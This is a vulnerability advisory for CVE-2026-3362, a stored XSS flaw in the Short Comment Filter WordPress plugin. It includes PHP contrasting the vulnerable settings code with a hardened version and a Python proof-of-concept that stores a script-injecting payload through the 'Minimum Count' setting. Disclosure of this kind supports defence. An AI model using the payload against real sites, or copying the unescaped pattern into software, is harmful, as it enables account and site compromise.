Security Vulnerability Report
CVE-2026-3362 CVSS 4.4 MEDIUM

CVE-2026-3362

Published: 2026-04-22 09:16:22
Last Modified: 2026-04-22 20:22:51

Description

The Short Comment Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Minimum Count' settings field in all versions up to and including 2.2. This is due to insufficient input sanitization (no sanitize callback on register_setting) and missing output escaping (no esc_attr() on the echoed value in the input's value attribute). The option value is stored via update_option() and rendered unescaped in an HTML attribute context. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in the settings page that will execute whenever a user accesses that page. This is particularly impactful in WordPress multisite installations or when DISALLOW_UNFILTERED_HTML is set, where administrators are not granted the unfiltered_html capability.
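The two defects the description names, a register_setting() call without a sanitize callback and a value echoed into an attribute without esc_attr(), are shown below in an added PHP illustration that is not the plugin's own code: the vulnerable settings pattern beside a hardened one. The scf_* function, option-group and option names and the default of 3 are assumptions.

```php
<?php
// Added illustration, not code from the Short Comment Filter plugin.
// Names prefixed scf_ are hypothetical.

// --- Vulnerable pattern, as the advisory describes it ---
function scf_vuln_register() {
    // No 'sanitize_callback': whatever an administrator posts is stored verbatim
    // by update_option() when the Settings API processes the form.
    register_setting( 'scf_options', 'scf_minimum_count' );
}

function scf_vuln_render_field() {
    $value = get_option( 'scf_minimum_count', 3 );
    // Raw value inside a double-quoted attribute: a stored value that starts
    // with "> terminates the attribute and the element, so the rest is parsed
    // as markup every time the settings page renders.
    echo '<input type="number" name="scf_minimum_count" value="' . $value . '">';
}

// --- Hardened pattern: sanitize on input AND escape on output ---
function scf_safe_register() {
    register_setting(
        'scf_options',
        'scf_minimum_count',
        array(
            'type'              => 'integer',
            'default'           => 3,
            // absint() coerces the submitted value to a non-negative integer,
            // so markup can never be persisted through this form.
            'sanitize_callback' => 'absint',
        )
    );
}

function scf_safe_render_field() {
    $value = (int) get_option( 'scf_minimum_count', 3 );
    // esc_attr() is still applied on output: a value that reached the option
    // table by another path (import, direct DB edit) is rendered inert.
    printf(
        '<input type="number" min="0" name="scf_minimum_count" value="%s">',
        esc_attr( $value )
    );
}

add_action( 'admin_init', 'scf_safe_register' );
```

The stricter of the two controls is the sanitize callback, since it removes the unsafe data at rest; the output escaping is what protects the page if sanitization is ever bypassed or the option is written elsewhere.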

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Short Comment Filter <= 2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Exploit Title: Short Comment Filter <= 2.2 Stored XSS
# Description: Injecting XSS payload via the 'Minimum Count' setting.
import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin.php?page=short-comment-filter-settings"
admin_cookie = "wordpress_logged_in_admin_cookie_value"

# Malicious payload to be stored
# The payload closes the value attribute and injects a script tag
xss_payload = '"><script>alert("XSS");</script>'

# Data payload for the POST request
post_data = {
    "action": "update",
    "option_page": "short_comment_filter_options",
    "_wpnonce": "[FETCH_NONCE_FROM_PAGE]",
    "_wp_http_referer": "/wp-admin/admin.php?page=short-comment-filter-settings",
    "minimum_count": xss_payload
}

headers = {
    "Cookie": f"wordpress_logged_in_...={admin_cookie}"
}

# Send the request to store the payload
response = requests.post(target_url, headers=headers, data=post_data)

if response.status_code == 200:
    print("Payload potentially stored. Visit settings page to trigger XSS.")
else:
    print("Failed to send request.")
```

References

Weakness: CWE-79
Vulnerability status: Deferred
CVSS v3.1 exploitability score: 1.3; impact score: 2.7

https://plugins.trac.wordpress.org/browser/short-comment-filter/tags/2.2/classes/short-comment-filter-settings.php#L21
https://plugins.trac.wordpress.org/browser/short-comment-filter/tags/2.2/classes/short-comment-filter-settings.php#L54
https://plugins.trac.wordpress.org/browser/short-comment-filter/tags/2.2/classes/short-comment-filter-settings.php#L61
https://plugins.trac.wordpress.org/browser/short-comment-filter/tags/2.2/views/settings.php#L25
https://plugins.trac.wordpress.org/browser/short-comment-filter/trunk/classes/short-comment-filter-settings.php#L21
https://plugins.trac.wordpress.org/browser/short-comment-filter/trunk/classes/short-comment-filter-settings.php#L54
https://plugins.trac.wordpress.org/browser/short-comment-filter/trunk/classes/short-comment-filter-settings.php#L61
https://plugins.trac.wordpress.org/browser/short-comment-filter/trunk/views/settings.php#L25
https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba46475-bf54-49a8-9b0e-fae3fb4e1df9?source=cve